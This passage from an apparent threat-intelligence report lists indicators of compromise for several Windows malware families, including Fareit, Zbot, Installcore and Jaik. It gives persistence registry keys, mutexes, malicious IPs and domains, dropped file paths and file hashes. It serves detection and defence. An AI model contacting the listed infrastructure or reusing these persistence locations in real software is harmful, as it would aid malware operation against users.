    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ecd15244c3e90a4fbd0588a41ab27c55
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\10000000090A2
    • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
    Mutexes
    • 8-3503835SZBFHHZ
    • O957R401SY5ZZzJz
    IP Addresses
    • 198.54.117.218
    • 104.27.180.157
    • 184.168.221.104
    • 52.72.89.116
    • 64.98.145.30
    • 107.173.153.58
    • 162.213.249.103
    • 180.76.141.40
    • 217.76.128.34
    • 104.237.136.127
    Domain Names
    • www.dingjian1688.com
    • www.tradewindsonlinemall.com
    • www.mewqaccmertgroup.com
    • www.holymedgap.com
    • www.tealeurope.com
    • www.clinicaslipedema.com
    • www.christynhomes.com
    • www.oliver-group.com
    • www.eloloans.com
    • www.yourdready.com
    • www.cinderellagames.com
    Files and/or directories created
    • %AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
    • %LocalAppData%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol
    • \PC*\MAILSLOT\NET\NETLOGON
    • %WinDir%\AppCompat\Programs\RecentFileCache.bcf
    • %ProgramFiles% (x86)\Bzv1lxh98
    • %ProgramFiles% (x86)\Bzv1lxh98\igfxnpttjhuh.exe
    • %LocalAppData%\Temp\Bzv1lxh98
    • %LocalAppData%\Temp\Bzv1lxh98\igfxnpttjhuh.exe
    • %AppData%\O957R401
    • %AppData%\O957R401\O95log.ini
    • %AppData%\O957R401\O95logim.jpeg
    • %AppData%\O957R401\O95logrc.ini
    • \TEMP\tmpQDq_1r.exe
    File Hashes
    • 20c27455b4a86eda29e494e4241f95599175133f8d852759be88641654374ef6
    • 286a7c32ede0a4650e399ee1fefc347d9265befc3381eacefdc63937e19cd6d4
    • 349a7f3b6c5cdb14d58b7eb8d2256a593f3097bf22960504d6d094472fbd1366
    • 3522d25848b5fe656d1fb100ae5d546f376569f8441f5c0e7745f4ac234a5c55
    • 7165fc0f622effb44f6893555e898f3cafea60858923409863e0e2528536999d
    • 7dd9adc72effd65e28191edfd0e282eb4375c3206983fdfae255d12d2f407e91
    • a6e515869be77e1f332df975ca719a54544a0fa56698607788294215369b2ff6
    • bf9274591ed4a439d9b5d8fd6e4c620804e7c33130c8cdc8258df3de7f330fd6
    • e1f0bfaa87925d5f89b9ccc3196246b26296a1ea305ab3bab6e681a78d130bf4
    • e3f0529b2f75ca2930b2bc3dc22d2ada08491abf7a3f384e8ef81ae91ef2b25d
    • fcf94877a6daa05e2e22d70f2d2deb469a655d77a8318a7d2b038a331364e780

    Coverage


    Screenshots of Detection

    AMP



    ThreatGrid



    Win.Dropper.Fareit-6584428-0



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKLM>\Software\Microsoft\Fusion\GACChangeNotification\Default
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    Mutexes
    • N/A
    IP Addresses
    • 216.146.43.71
    Domain Names
    • checkip.dyndns.org
    Files and/or directories created
    • %AppData%\MDU Resources Group Inc\MDU Resources Group Inc.exe
    • %AppData%\MDU Resources Group Inc
    File Hashes
    • 09aee7d45b4d4990fbfe44fbc41d908d363c3c6b3a68a633b6d0d88819dd8203
    • 0ab5ea239c3b4a2eae0c9a8d7fe6fbfceb877e542a823bf971e712efaac84a00
    • 0ad759f72f4c8fcfb84067b4b53776763c2e5b663ee1617f15135918a056bc4f
    • 21793b775320c182c4db6ffd742445ddddc9dd4925ef1ca979ed6a35c617fd45
    • 27a501fb263df4360b53753c91a66bda55541d7e0b43e5698665978f537a2eb8
    • 2ff4ee2c05c59076e923c0ee07a27a2f8434fcfe047d341538b1ea8cdfa6729d
    • 3ac4b5cd646a722924118e761366480c83ab278dbb5416a5e58e0eddf3a1b903
    • 406d5dc4de69215015543a52be7d3bafdeb7191adc98084563d55b5996659ce4
    • 437068cc219c152d4bef83c2dd6916e0c0a090eb607c68018c28c6ac82c84b2f
    • 4c65d4cf2a7773a7358323b826665b0dcc8eefaa6cc543fb493f3aff3329804a
    • 7ff6c48e69875b5d824d1a6b005e179002076f4ce90fce5c9a22f044ac65291c
    • 94a44a077ea320d2bbf338b72fa4c263d8cf70eb398c5ffb07d5dc7e0adf840d
    • a92ad1f6f77b663420940708572de26cbaaeb70d4e22114f7c1c8f62d7f4d500
    • b381f69867fff9a3e07c84f7186a1ed86dbf98c7b9f09df3978b6649e13fb1c3
    • b5e589fd4e4522ab6320a76a1c2e69e6e1e557628e87cc16e0572ef0f31453d8
    • c0b1a8acf40906c0c0ee2041ee1e3f1c04ec0b73602b0ed8e8e97104075c70a7
    • c11d18e057fd911901e9473689b04156110cf5eea97e4b33f363b00ad0d161e0
    • c4df3b3743c9696c5f20b9763644bff65500440019bbc83f85930ddb287a936b
    • e18f8ac7f8275e648ef44c882e032389770e0ce4fda43142b69ab23ab4e9f45d
    • e9c8209739ed62082a8f9cb4067ab2c8ff2588db6c0a165726b55cb5bef62695
    • f32c8bd9e3c0bedcbe6c33d08723513d3da438219902c25012c10d648a11d824
    • f51967541563d54bd8e7219a127d5f2189cf01eb33236729b3dbb540b171d17d
    • fd29ce672f03d7970cbedcd45a75e512a1df62e758f5776b90e1af6f1a2c2f2c

    Coverage


    Screenshots of Detection

    AMP



    ThreatGrid



    Win.Dropper.Zbot-6584477-0



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES\TCPIP_{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • <HKCU>\SOFTWARE\MICROSOFT\Ycbi
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
    Mutexes
    • N/A
    IP Addresses
    • N/A
    Domain Names
    • roster.su
    • etot.su
    Files and/or directories created
    • %LocalAppData%\Temp\tmpb550dbcc.bat
    • %AppData%\Ikywz
    • %AppData%\Ikywz\opmaf.exe
    • %AppData%\Meen
    • %AppData%\Meen\moibq.aqy
    • %AppData%\Zulie
    • %AppData%\Zulie\ylhib.ecf
    • %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat
    • \TEMP\tmpWfEKb5.exe
    • %AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred
    • %AppData%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\faf08ed1-edb0-448c-809a-73cb275c3833
    File Hashes
    • 153f450b211047e543b1ccce8ef6afe41a476aeccfd961cd0159d24e1096f77f
    • 20d24c1936867db7511ec35003079dfd0bd6fa91f4bc0b34485c7f3a5adf31b4
    • 71361e9c9a716ad6b6e0cc13e35b1f3ac0e39aa1eb33d445b87add909fb6e665
    • b9163c8a5974b8b9397fc2af2fa692cbf6a9e332bf2fc5cc7cfe4ef256ec3bc6
    • bb463702eb24d0d43d4510366ef05dc0cc5d6c001db2d80b7da59ce27d0f096c
    • bfe8551016d5e77bc71774f3a1bb7b194ed0817ae11155347c8b3ec8f8f9578d
    • d2c7a02492ab09e846a8dac12ab7bb7d742f0052071ab194cb6f838c68b14381
    • df65bd267142c58835136c519d40eb4b529b735e4d0ee7baa7aee00e62d17f00
    • e1de7ded32c7deabba387fd5ccf09d62c8fbd13b18a6bf1c8fa17d6746688c84
    • f675c120ed096112a120ec9b4a72dd589f5fed33d280b851c71d1c9657397a5f
    • f9dd63a23f4cf30db953e13d2a9f66fa6db69ac59b432f3a7abe9b6d9a955631
    • fb48a9b9da0d772521f925d3f578930cbd078e438d8c0a796a1112f1f96db659

    Coverage


    Screenshots of Detection

    AMP



    ThreatGrid


    Win.Trojan.Generic-6584512-1



    Indicators of Compromise


    Registry Keys
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP
    • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\IndexTable
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D3
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\8000000005683
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\A00000000572A
    • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\GENRALNLA
    • <HKU>\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    Mutexes
    • PEM1A4
    • PEM938
    • PEMB6C
    • PEM570
    • PEM6D0
    • PEM53C
    • PEMB18
    IP Addresses
    • 192.168.1.1
    • 255.255.255.255
    • 192.168.1.255
    • 70.182.77.184
    • 69.17.170.58
    • 209.85.144.108
    • 68.1.17.8
    • 209.85.144.16
    • 62.254.26.220
    • 82.57.200.135
    • 193.252.22.86
    • 194.60.217.89
    • 74.124.44.100
    • 195.200.78.68
    • 64.8.71.14
    • 108.167.146.22
    • 193.252.22.84
    • 208.91.199.223
    • 64.210.232.50
    • 192.185.4.48
    • 217.79.186.14
    • 66.147.240.163
    • 64.98.36.162
    • 69.168.97.48
    • 62.254.26.231
    • 62.24.139.43
    • 216.40.42.154
    • 40.97.188.226
    • 184.154.202.50
    • 143.95.253.117
    • 198.89.124.197
    • 158.69.57.254
    • 192.185.4.148
    • 69.163.253.7
    • 74.208.196.99
    • 212.1.215.225
    • 195.229.241.221
    • 69.89.31.229
    • 54.169.79.115
    • 93.17.128.164
    • 50.87.144.90
    • 64.136.52.50
    • 144.217.66.117
    • 69.168.97.78
    • 62.24.202.43
    • 52.71.59.20
    • 64.4.202.62
    Domain Names
    • smtp.orange.fr
    • smtp.googlemail.com
    • smtp.crosbyisd.org
    • smtp.robeson.k12.nc.us
    • smtp.fuse.net
    • smtp.tim.it
    • smtp.cox.net
    • smtp.blueyonder.co.uk
    • mail.vd.educanet2.ch
    • smtp.gmail.com
    • mail.wanadoo.fr
    • gator4037.hostgator.com
    • bbm-exchange.bbm-germany.de
    • mail.cmidwest.com
    • mail.banit.club
    • mail.sfr.fr
    • smtp.netzero.com
    • mail.telebeep.com
    • smtp.tiscali.co.uk
    • mail.virgin.net
    • s4.fcomet.com
    • smtp.gtscarrier.com
    • smtp.charter-business.net
    • mail.cecompute.com
    • smtp.hughes.net
    • smtp.rcn.com
    • mail.dbmcbride.com
    • smtp.talktalk.net
    • smtp.whitecars.com
    • gator4136.hostgator.com
    • mail.niuelec.com.pg
    • mail.rjcables.com
    • gator3071.hostgator.com
    • mail.fuse.net
    • smtp.wanadoo.fr
    • smtp.exchange.1and1.com
    • smtp.orthopaedicsopenjournal.com
    • mail.tropitelvalley.com
    • smtp.exchange.emailservice.io
    • box429.bluehost.com
    • mail.cmail.club
    • mail.xplornet.ca
    • mail.labolab.com.ec
    • smtp.nhspeedometer.com
    • smtp.emirates.net.ae
    Files and/or directories created
    • \srvsvc
    • %WinDir%\AppCompat\Programs\RecentFileCache.bcf
    • %System32%\config\SYSTEM
    • %System32%\config\SYSTEM.LOG1
    • %WinDir%\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
    • %WinDir%\SysWOW64\wrGwEEi.exe
    File Hashes
    • 07fd0e423c2272c76323d8b816f83ff4e4715fa97d22ef331131bd4ac5b084b4
    • 114d916fdfc70a518790f184311ff5ef3488b4181366e782b37c0d68fdfd2f1e
    • 482be1caf6a2a0b959a4a40460c007f88615ab787b8771474f9c6fc5cf5acf66
    • 4ac3cc415b1b3847b69ec0e7fb4287dce886fe17631a4f5a9f0f400118aa972a
    • 5ad9c2866e77495fe2d41c5067879bb938716fe00e4a8dbcfaa7b90a8b53655e
    • 5f12c45ebd24669b0e69e63c549c6812d742220c5221bb147c6312f1a68ac5dc
    • 6a3d06d6bbe7b98f604cc9167b7a96c94b8fb7f749f893038926f552b56c8931
    • 7335842c08c2f8caecf1754ca5d5ee75d9a4cdaae05d70792dd4be56127de424
    • 7f198deac8ecf78fc1658728669c1523176a65d71e95605b28991b09a40a6259
    • 8387856244d53a3025f8eafbe1cd2bbfcf0c40c6a04f70de1d0e22d29261de96
    • 86d9d667ba5d0880ada452dbac0b6dec35c30248398d14f984143ce7738e61fa
    • 969e2c1803df2eda353feb8381687922d28d58bc2910feabc894842d4d9a388f
    • 9c5e793117db00555164da86a4c4f075b24abef08b313bc192bb80a9f55f4e69
    • 9fbbcd37da800026d3dcd10d2e3cd622447ff0d91c65c6ddf4a232dee2b6f054
    • cc0208db49b171a19a6309301e78a0619bf3122887da1d28ea29ee0e84717026
    • dad9965c05194ec329b240eec4e975269c2f4bc2a3fdda057872991c541ef7f8
    • e7f818214208a01677a70b60b598703ab4c4408b1a495172e25934a7ae11c84b

    Coverage


    Screenshots of Detection

    AMP



    ThreatGrid



    Win.Malware.Installcore-6584374-1



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • <HKCU>\Software\Microsoft\Internet Explorer\Main
    Mutexes
    • !IECompat!Mutex
    IP Addresses
    • 35.163.153.35
    • 52.206.6.222
    • 52.42.47.197
    • 34.218.108.244
    Domain Names
    • rp.totikik1.com
    • os.totikik1.com
    • os2.totikik1.com
    Files and/or directories created
    • %LocalAppData%\Temp\in699DB22B\
    • %LocalAppData%\Temp\in699DB22B\2A4213C8.tmp
    • %LocalAppData%\Temp\INH265~1\css\
    • %LocalAppData%\Temp\INH265~1\css\ie6_main.css
    • %LocalAppData%\Temp\INH265~1\css\main.css
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\browse.css
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\button.css
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\checkbox.css
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\images\
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\images\button-bg.png
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg-corner.png
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg.png
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\images\progress-bg2.png
    • %LocalAppData%\Temp\INH265~1\css\sdk-ui\progress-bar.css
    • %LocalAppData%\Temp\INH265~1\csshover3.htc
    • %LocalAppData%\Temp\INH265~1\form.bmp.Mask
    • %LocalAppData%\Temp\INH265~1\images\
    • %LocalAppData%\Temp\INH265~1\images\BG.png
    • %LocalAppData%\Temp\INH265~1\images\Close.png
    • %LocalAppData%\Temp\INH265~1\images\Close_Hover.png
    • %LocalAppData%\Temp\INH265~1\images\Color_Button.png
    • %LocalAppData%\Temp\INH265~1\images\Grey_Button.png
    • %LocalAppData%\Temp\INH265~1\images\Grey_Button_Hover.png
    • %LocalAppData%\Temp\INH265~1\images\Loader.gif
    • %LocalAppData%\Temp\INH265~1\images\Progress.png
    • %LocalAppData%\Temp\INH265~1\images\ProgressBar.png
    • %LocalAppData%\Temp\INH265~1\images\sponsored.png
    • %LocalAppData%\Temp\INH265~1\locale\
    • %LocalAppData%\Temp\INH265~1\locale\EN.locale
    • %LocalAppData%\Temp\INH265~1\images\Color_Button_Hover.png
    • %LocalAppData%\Temp\9E6FFDFF.log
    • %LocalAppData%\Temp\9E7000AD.log
    • %LocalAppData%\Temp\9E7000BD.log
    • %LocalAppData%\Temp\inH265813966324383\
    • %LocalAppData%\Temp\inH265813966324383\bootstrap_5001.html
    • %ProgramFiles% (x86)\9E7009E1.log
    File Hashes
    • 00f5fb9fcc5740a8538141cd5faba3ff4c326558c62e5e95da316129785673c5
    • 012a09533536cc77bf0eaed8ab3acefae793bdd35223ce5391710c70ddffe393
    • 0135775f4298ddb7b44b2bb40c869c8ad78ba874203e151634eb2c71506c7332
    • 0546adad07a2169c980d9965bc94ed94b9fce9b2f310ae1be8c6df3ba8c0a177
    • 09d060282484fb0eed75a2f7e5970699b002c42ebddd5b0017911b01706f4646
    • 09d603e99ccec947facb2b2da48bd5c7da44c622da2c97344fa89ed39dd65812
    • 0a1c695bef83997a684e845b9179c9e229e4ca479e92e81b2e006dac6f559fe9
    • 0a52f81e4d9c244880353df9b641c88f4649ced7df1a820c1bcc5a9722189a0b
    • 0c07cb171aa5978cd5eeeecd22ed32b83e253926f82a439f2be076248894b1d9
    • 0c97012e37ef8f55af1b9926c065c9c08bc32224718f2bbd6f3a3e971f6075d7
    • 0e4ee2f6bddd019745bfca57bd47260ba52e0c8bc42013036b05d89fc643592a
    • 0ec5f5d88faf0ed99235adf55c0f97870512a10144d97d8b32658bf718d4bca8
    • 0fb590428e8b12d48d74e7744bb00aaa88c9079deadc8f5e61aec1145e67e0c1
    • 1357c5fa8e01e446f4ec0065e7400b5810ee53115735f09e97a3af413b6d8de9
    • 14018597d0f8231df086e21e0d8660b4ad94aeda5fefd3749604039731d50f55
    • 14416c9bf4c7b938377b528cddd359509ce3c09a57b12a756451432f96e3e8a9
    • 15d4ce867af59a0f95c4acd35c4abd4e0d8fe199a7a32fae5480c68669aa2469
    • 17bde73dc4ee1fd1999d6efe7519a25bbfc61fe53c705665a2451b26367826b4
    • 1806d1dc9deebea348c03f731696c0191f7ddf74b7c3af512df96e9c86dade47
    • 185b0a621bd278df79a77eddecfe9908e8032b9e19d5db930ef5cfa56b766a45
    • 1b6f5acaa8737285ab91f7ca5d80dff908aee706254c1aad1eabb8f310f78649
    • 1cd10e184752c9eb4bc7c1d3301bc80f5d56b25c294d66945e4ae86653aa87a8
    • 1e6bb4ed50b658e0bdd74fdfbb7897f847d83be01292b19fc29d4ebcc52557b6
    • 200de4855c7523956ccbd08585b6102cec28ddc0710a6a1e11885b7b73b1d541
    • 20ba5231bc9b84ce5640aca571ca65f76b0d1e2e5ff07250057c2757b3d58262

    Coverage


    Screenshots of Detection

    AMP



    ThreatGrid


    Win.Trojan.Jaik-6584366-1



    Indicators of Compromise


    Registry Keys
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES
    • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY
    • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\INDEXTABLE\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}\1000000008F79
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\LRULIST\00000000000029D6
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\Indexes
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB6\INDEXES\FileIdIndex-{3f37ba64-ef5c-11e4-bb8d-806e6f6e6963}
    • <A>\{F698CDEA-372F-11E8-8419-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\AB5\INDEXES\FILEIDINDEX-{3F37BA64-EF5C-11E4-BB8D-806E6F6E6963}
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\33fd244257221b4aa4a1d9e6cacf8474
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4c8f4917d8ab2943a2b2d4227b0585bf
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5309edc19dc6c14cbad5ba06bdbdabd9
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\82fa2a40d311b5469a626349c16ce09b
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9e71065376ee7f459f30ea2534981b83
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a88f7dcf2e30234e8288283d75a65efb
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\d33fc3b19a738142b2fc0c56bd56ad8c
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ecd15244c3e90a4fbd0588a41ab27c55
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
    • <HKCU>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
    • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
    Mutexes
    • 8-3503835SZBFHHZ
    • O247ST8-UYZ6KDCz
    IP Addresses
    • 34.202.122.77
    • 199.34.228.159
    • 188.93.150.105
    • 199.193.6.130
    • 79.98.129.62
    • 198.185.159.145
    • 156.67.212.57
    • 94.73.146.154
    Domain Names
    • www.acilklimaservisi.net
    • www.mediquipmedicalsolutions.net
    • www.thisforthatquidproquo.com
    • www.verim.site
    • www.nextdealworld.com
    • www.pelatihanukm.com
    • www.maydiamondbeautyandstyle.com
    • www.mirrorxr.com
    • www.nuuee.com
    • www.walktofinancialfreedom.com
